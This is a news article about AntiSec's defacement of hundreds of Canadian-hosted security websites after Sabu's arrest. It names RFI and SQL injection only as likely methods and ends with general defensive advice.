On Wednesday, the AntiSec movement defaced hundreds of websites in what was said to be proof that the movement works just fine without Sabu, their alleged leader who was arrested and flipped by the FBI last year.
The sites that were defaced have something in common, they were security related and were all hosted by Shaw Cable directly, or by its subsidiary Mountain Cablevision, both of which are in Canada.
“Our Vessel sailed through their servers collecting all information they owned. These companies earn money exploiting the fear of the people and their feeling of daily life state sponsored insecurity,” an AntiSec statement explained.
“We are doing this not only to cause embarrassment and disruption to the security community but to show we are still alive and well... Law enforcement collaborators, and military contractors, private security companies beware: we're coming for your mail spools, barely legal porn, your sister’s pix and confidential documents.”
The attack targeted three different servers. One was a dedicated hosting account, while the other two leveraged shared hosting. The security related websites such as datasci.net, trojan-sis.com, e.password.com, and securitytrainingsupport.com, were announced by AntiSec, but hundreds of others were caught in the crossfire.
At the time this story was written, a majority of the attacked domains were offline completely or reporting database connection errors. A full list of the domains present on the servers attacked can be seen here.
When it comes to the shared hosting environments, the likely avenue of attack exploited in this case was Remote File Inclusion (RFI). This would have allowed AntiSec supporters full access to the targeted website after uploading a malicious shell script. Depending on the permissions of the server itself, access to every other domain hosted on it could be gained form that point.
Another possible access point, based on viewing versions of the targeted websites before they were attacked, is SQL Injection (SQLi). In the past, this method of attack has allowed AntiSec supporters to wreak havoc on a domain, and walk off with confidential and sensitive information. SQLi will also allow mass attacks within a shared environment due to the fact that the databases are often stored locally.
SecurityWeek reached out and asked about the methods used during the attacks, given that the defacement message mentioned backdoors into the servers, but were turned away. The only comment for the record was “Also Cocks.” (For the unfamiliar, this term can be used several ways. One is lulz, or amusement. The other is a quick way to tell someone to go away. AntiSec doesn’t always like to give away their methods, and when they do it’s often within the defacement message itself.)
Earlier this month, after the FBI announced the arrest of Sabu and the fact that they had turned him in order to collect evidence against other LulzSec members and Anonymous supporters, one Special Agent close to the case mentioned that the arrest had cut the head off of the movement.
That same day, AntiSec targeted Panda Security, defacing a webserver that hosting several sub-domains used by the company. According to AntiSec’s claims, Panda has helped put 25 people behind bars for their involvement in various operations championed by Anonymous, in addition to lurking on their public IRC space in an attempt to identify various chat participants.
Panda’s Technical Director, Luis Corrons, commented, “Even though we have not helped LE to bring to jail any LulzSec member, I would have loved to be involved in that.” Panda recovered the webserver within hours, and no critical information was lost. The point that AntiSec is making should be clear, just because people have been arrested, the threat that supporters of the movement pose has not gone away. Those who celebrated and figured that the threat had passed are in for a rude awakening should they let their guard down.
As always, organizations should check their critical web applications and protect the assets that are most valuable, which is often the information collected for day to day operations. Proper coding practices and security auditing, system and software patches for the webservers, leveraging the rule of least privilege and disabling services that are non-essential are just some of the steps that will prevent basic attacks from working.
Just remember, if an attacker is targeting your organization directly, there’s little you can do to stop them as they’re likely to get in eventually, which is why incident response is just as important as risk management.